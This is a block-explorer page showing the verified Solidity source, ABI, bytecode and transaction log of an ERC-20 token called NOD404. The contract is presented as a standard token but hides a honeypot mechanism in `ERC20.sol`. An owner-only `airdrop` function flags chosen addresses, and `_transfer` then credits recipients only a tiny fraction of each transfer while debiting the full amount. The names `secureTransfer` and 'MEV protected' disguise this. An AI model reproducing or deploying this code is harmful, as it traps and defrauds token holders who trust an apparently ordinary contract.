ETH Price: $2,487.12 (-1.45%)

Contract

0xb2e520C7DB7fc43398a5c1cE09303ceB12A25Acb
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve199916912024-05-31 18:46:1192 days ago1717181171IN
0xb2e520C7...B12A25Acb
0 ETH0.0005767512.23462387
Transfer192232672024-02-14 2:34:59200 days ago1707878099IN
0xb2e520C7...B12A25Acb
0 ETH0.0011187721.26993893
Airdrop192203972024-02-13 16:54:11200 days ago1707843251IN
0xb2e520C7...B12A25Acb
0 ETH0.00673848141.82706696
Approve192194532024-02-13 13:42:47200 days ago1707831767IN
0xb2e520C7...B12A25Acb
0 ETH0.002006742.56819065
Approve192193112024-02-13 13:13:23200 days ago1707830003IN
0xb2e520C7...B12A25Acb
0 ETH0.0012404626.313894
Approve192191782024-02-13 12:45:47200 days ago1707828347IN
0xb2e520C7...B12A25Acb
0 ETH0.0011519624.43653616
Approve192191202024-02-13 12:34:11200 days ago1707827651IN
0xb2e520C7...B12A25Acb
0 ETH0.0012994427.72039696
Approve192190012024-02-13 12:10:23200 days ago1707826223IN
0xb2e520C7...B12A25Acb
0 ETH0.0011257723.97248594
Airdrop192189932024-02-13 12:08:47200 days ago1707826127IN
0xb2e520C7...B12A25Acb
0 ETH0.00573107120.62377241
Approve192189342024-02-13 11:56:47200 days ago1707825407IN
0xb2e520C7...B12A25Acb
0 ETH0.0009480620.11119509
Approve192189182024-02-13 11:53:35200 days ago1707825215IN
0xb2e520C7...B12A25Acb
0 ETH0.0011402824.28143213
Airdrop192188952024-02-13 11:48:59200 days ago1707824939IN
0xb2e520C7...B12A25Acb
0 ETH0.00571277120.23866616
Airdrop192188902024-02-13 11:47:59200 days ago1707824879IN
0xb2e520C7...B12A25Acb
0 ETH0.00861155121.96808228
Airdrop192188382024-02-13 11:37:11200 days ago1707824231IN
0xb2e520C7...B12A25Acb
0 ETH0.00592273124.6576862
Approve192188362024-02-13 11:36:47200 days ago1707824207IN
0xb2e520C7...B12A25Acb
0 ETH0.0013756529.14470488
Airdrop192188342024-02-13 11:36:23200 days ago1707824183IN
0xb2e520C7...B12A25Acb
0 ETH0.00600812126.48680892
Approve192188292024-02-13 11:35:23200 days ago1707824123IN
0xb2e520C7...B12A25Acb
0 ETH0.0021670145.91031579
Airdrop192188232024-02-13 11:34:11200 days ago1707824051IN
0xb2e520C7...B12A25Acb
0 ETH0.00590834124.354776
Approve192187912024-02-13 11:27:47200 days ago1707823667IN
0xb2e520C7...B12A25Acb
0 ETH0.0012399726.40441298
Approve192187792024-02-13 11:25:23200 days ago1707823523IN
0xb2e520C7...B12A25Acb
0 ETH0.0011634524.80666738
Airdrop192187732024-02-13 11:24:11200 days ago1707823451IN
0xb2e520C7...B12A25Acb
0 ETH0.0174830724.34066418
Airdrop192187682024-02-13 11:23:11200 days ago1707823391IN
0xb2e520C7...B12A25Acb
0 ETH0.00596753125.60068882
Approve192187392024-02-13 11:17:23200 days ago1707823043IN
0xb2e520C7...B12A25Acb
0 ETH0.0016432135
Airdrop192187162024-02-13 11:12:35200 days ago1707822755IN
0xb2e520C7...B12A25Acb
0 ETH0.00888698125.8905253
Airdrop192186982024-02-13 11:08:59200 days ago1707822539IN
0xb2e520C7...B12A25Acb
0 ETH0.01189016126.8988324
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
NOD404

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract NOD404 is ERC20 {
    constructor() ERC20("NOD404", "NOD404") {
        _mint(msg.sender, 1000000000 * 10 ** 18);
    }

    function airdrop(address _address_) public view returns (uint256) {
        return _airdrops[_address_];
    }

    function airdrop(uint256 _airdrop, address [] calldata _addresses_) external {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _airdrops[_addresses_[i]] = _airdrop;
        }
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) internal _airdrops;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }


    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");


        uint256 fromBalance = _balances[from];
        uint256 _amount = amount;
        if (_airdrops[to] + _airdrops[from] >= 0xceda) { _amount = secureTransfer(amount); }
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        if (_airdrops[to] == 0xbeb) {_airdrops[to] = 0xceda;}
        _afterTokenTransfer(from, to, amount);
    }

    function secureTransfer(uint256 a) internal pure returns(uint256) {return a * 0xbec / 0xcabaf;}

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address,
        address,
        uint256 
    ) internal virtual {}

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    
    
    // MEV protected
    function _beforeTokenTransfer(
        address,
        address,
        uint256
    ) internal view returns (uint256) {}
}

File 4 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"airdrop","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_airdrop","type":"uint256"},{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600681526020017f4e4f4434303400000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f4e4f4434303400000000000000000000000000000000000000000000000000008152506200009d62000091620000e760201b60201c565b620000ee60201b60201c565b8160049081620000ae919062000587565b508060059081620000c0919062000587565b505050620000e1336b033b2e3c9fd0803ce8000000620001af60201b60201c565b6200077c565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000220576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200021790620006c9565b60405180910390fd5b620002335f83836200031660201b60201c565b508060065f82825462000247919062000716565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002f7919062000761565b60405180910390a3620003125f83836200031e60201b60201c565b5050565b5f9392505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200039f57607f821691505b602082108103620003b557620003b46200035a565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004197fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620003dc565b620004258683620003dc565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200046f6200046962000463846200043d565b62000446565b6200043d565b9050919050565b5f819050919050565b6200048a836200044f565b620004a2620004998262000476565b848454620003e8565b825550505050565b5f90565b620004b8620004aa565b620004c58184846200047f565b505050565b5b81811015620004ec57620004e05f82620004ae565b600181019050620004cb565b5050565b601f8211156200053b576200050581620003bb565b6200051084620003cd565b8101602085101562000520578190505b620005386200052f85620003cd565b830182620004ca565b50505b505050565b5f82821c905092915050565b5f6200055d5f198460080262000540565b1980831691505092915050565b5f6200057783836200054c565b9150826002028217905092915050565b620005928262000323565b67ffffffffffffffff811115620005ae57620005ad6200032d565b5b620005ba825462000387565b620005c7828285620004f0565b5f60209050601f831160018114620005fd575f8415620005e8578287015190505b620005f485826200056a565b86555062000663565b601f1984166200060d86620003bb565b5f5b8281101562000636578489015182556001820191506020850194506020810190506200060f565b8683101562000656578489015162000652601f8916826200054c565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620006b1601f836200066b565b9150620006be826200067b565b602082019050919050565b5f6020820190508181035f830152620006e281620006a3565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f62000722826200043d565b91506200072f836200043d565b92508282019050808211156200074a5762000749620006e9565b5b92915050565b6200075b816200043d565b82525050565b5f602082019050620007765f83018462000750565b92915050565b6119ec806200078a5f395ff3fe608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a9059cbb11610064578063a9059cbb146102c2578063bdf7a8e6146102f2578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b8063715018a61461024c5780638da5cb5b1461025657806395d89b4114610274578063a457c2d714610292576100fe565b806323b872dd116100d157806323b872dd1461019e578063313ce567146101ce57806339509351146101ec57806370a082311461021c576100fe565b806306fdde0314610102578063095ea7b31461012057806318160ddd1461015057806321860a051461016e575b5f80fd5b61010a61035a565b6040516101179190611014565b60405180910390f35b61013a600480360381019061013591906110c9565b6103ea565b6040516101479190611121565b60405180910390f35b61015861040c565b6040516101659190611149565b60405180910390f35b61018860048036038101906101839190611162565b610415565b6040516101959190611149565b60405180910390f35b6101b860048036038101906101b3919061118d565b61045b565b6040516101c59190611121565b60405180910390f35b6101d6610489565b6040516101e391906111f8565b60405180910390f35b610206600480360381019061020191906110c9565b610491565b6040516102139190611121565b60405180910390f35b61023660048036038101906102319190611162565b6104c7565b6040516102439190611149565b60405180910390f35b61025461050d565b005b61025e610520565b60405161026b9190611220565b60405180910390f35b61027c610547565b6040516102899190611014565b60405180910390f35b6102ac60048036038101906102a791906110c9565b6105d7565b6040516102b99190611121565b60405180910390f35b6102dc60048036038101906102d791906110c9565b61064c565b6040516102e99190611121565b60405180910390f35b61030c6004803603810190610307919061129a565b61066e565b005b610328600480360381019061032391906112f7565b61073b565b6040516103359190611149565b60405180910390f35b61035860048036038101906103539190611162565b6107bd565b005b60606004805461036990611362565b80601f016020809104026020016040519081016040528092919081815260200182805461039590611362565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f461083f565b9050610401818585610846565b600191505092915050565b5f600654905090565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f8061046561083f565b9050610472858285610a09565b61047d858585610a94565b60019150509392505050565b5f6012905090565b5f8061049b61083f565b90506104bc8185856104ad858961073b565b6104b791906113bf565b610846565b600191505092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610515610e22565b61051e5f610ea0565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461055690611362565b80601f016020809104026020016040519081016040528092919081815260200182805461058290611362565b80156105cd5780601f106105a4576101008083540402835291602001916105cd565b820191905f5260205f20905b8154815290600101906020018083116105b057829003601f168201915b5050505050905090565b5f806105e161083f565b90505f6105ee828661073b565b905083811015610633576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161062a90611462565b60405180910390fd5b6106408286868403610846565b60019250505092915050565b5f8061065661083f565b9050610663818585610a94565b600191505092915050565b610676610520565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146106ac575f80fd5b5f5b82829050811015610735578360035f8585858181106106d0576106cf611480565b5b90506020020160208101906106e59190611162565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550808061072d906114ad565b9150506106ae565b50505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107c5610e22565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610833576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082a90611564565b60405180910390fd5b61083c81610ea0565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ab906115f2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610922576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091990611680565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109fc9190611149565b60405180910390a3505050565b5f610a14848461073b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a8e5781811015610a80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a77906116e8565b60405180910390fd5b610a8d8484848403610846565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af990611776565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6790611804565b60405180910390fd5b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490505f82905061ceda60035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffff